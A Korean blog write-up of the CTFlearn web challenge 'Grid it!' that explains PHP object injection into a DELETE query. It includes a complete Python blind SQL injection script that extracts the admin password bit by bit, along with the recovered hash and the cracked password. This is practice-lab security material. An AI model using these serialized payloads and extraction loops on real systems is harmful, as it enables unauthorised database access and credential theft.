Post

CTFlearn - [Web] Grid it! (풀이 봄)

Wargame, CTFlearn
Webhacking CTFlearn CTFlearn Webhacking Blind SQL Injection PHP Object injection serialize() unserialize() 풀이 봄
Posted

Grid it!


Link : ctflearn.com/challenge/430


image


1
2
3
4

Can you bypass the security measures on the site and find the flag? 
I doubt it. 

http://web.ctflearn.com/grid


image





Solution


가입을 한 뒤 로그인을 해봤는데 로그인이 안됌.

그래서 그냥 로그인을 해보면 아래와 같이 좌표를 입력하는 부분이 나옴.


image



여기서 소스코드를 보면 아래와 같이 serialize화 되어있는 코드가 보임.


image


<

우선 좌표 입력에는 숫자만 가능해서 포기. 삭제하는 부분에서 어떻게 하면 될 것 같았음.

우선 코드를 생각해보면 point 클래스 안에 변수 x, y, ID가 있을 것임.


여기서 더 못가서 풀이를 살짝 보았는데.. delete를 할 때 아마도 ID 값이 DELETE SQL문의 인자로 넘어갈 것임.

따라서 DELETE FROM ... WHERE ID=$classvar->ID 처럼 될 것임.

그럼 ID 값을 0 or 1로 하면 DELETE FROM ... WHERE ID=0 or 1이 될 것이므로 좌표 값들이 전부 삭제가 되는 것을 볼 수 있음.

이 점을 이용해서 Blind SQL Injection으로 table_name, column_name을 알아낸 뒤 flag가 있는 곳을 찾아야 함.



코드는 아래와 같고 table_name, column_name, 특정 컬럼의 값들을 구할 때마다 값들을 바꿔주면 됨.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

import requests

global url, headers, cookies

url = "https://web.ctflearn.com/grid/controller.php"
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies= {
	'PHPSESSID':'[redacted]',
	'_ga':'[redacted]',
	'__gads':'[redacted]',
	'_gid':'[redacted]'
}

def add_point(): 
	data={'x':'1', 'y':'2'}
	requests.post(url+'?action=add_point',data=data, headers=headers, cookies=cookies)


table_name='' # point, user
column_name='' # user -> username, password, uid

# username='admin'
pw='' # 0c2c99a4ad05d39177c30b30531b119b -> grapevine


for i in range(33,101):
	add_point()

	chklen = 0
	sql_len = 113 if i < 10 else 114

	payload = {
		'action':'delete_point',
		'point':'O:5:"point":3:{s:1:"x";s:1:"1";s:1:"y";s:1:"1";s:2:"ID";s:'+str(sql_len)+':"0 or if((select length(bin(ascii(substr(password,'+str(i)+',1)))) from user where username=\'admin\' limit 0,1)=6,2535270,0)";}'
	}
	requests.get(url, params=payload, headers=headers, cookies=cookies)

	res=requests.get('https://web.ctflearn.com/grid/index.php',headers=headers,cookies=cookies)
	if "ID: 2535270&nbspx:" not in res.text:
		chklen=6
	else:
		chklen=7

	pw_bit=''
	add_point()
	for j in range(1,chklen+1):
		get_len = 117 if i < 10 else 118
		payload = {
			'action':'delete_point',
			'point':'O:5:"point":3:{s:1:"x";s:1:"1";s:1:"y";s:1:"1";s:2:"ID";s:'+str(get_len)+':"0 or if((select substr(bin(ascii(substr(password,'+str(i)+',1))),'+str(j)+',1) from user where username=\'admin\' limit 0,1)=1,2535270,0)";}'
		}
		requests.get(url, params=payload, headers=headers, cookies=cookies)

		res=requests.get('https://web.ctflearn.com/grid/index.php',headers=headers,cookies=cookies)
		if "ID: 2535270&nbspx:" not in res.text:
			pw_bit+='1'
			add_point()
		else:
			pw_bit+='0'

	print("pw_bit[{}] : ".format(i), pw_bit)
	pw+=chr(int(pw_bit,2))
	print("pw :", pw)





참고


Link : github.com/terjanq/Flag-Capture/tree/master/Practice/CTFLearn/GridIt



Wargame, CTFlearn
Webhacking CTFlearn CTFlearn Webhacking Blind SQL Injection PHP Object injection serialize() unserialize() 풀이 봄
This post is licensed under CC BY 4.0 by the author.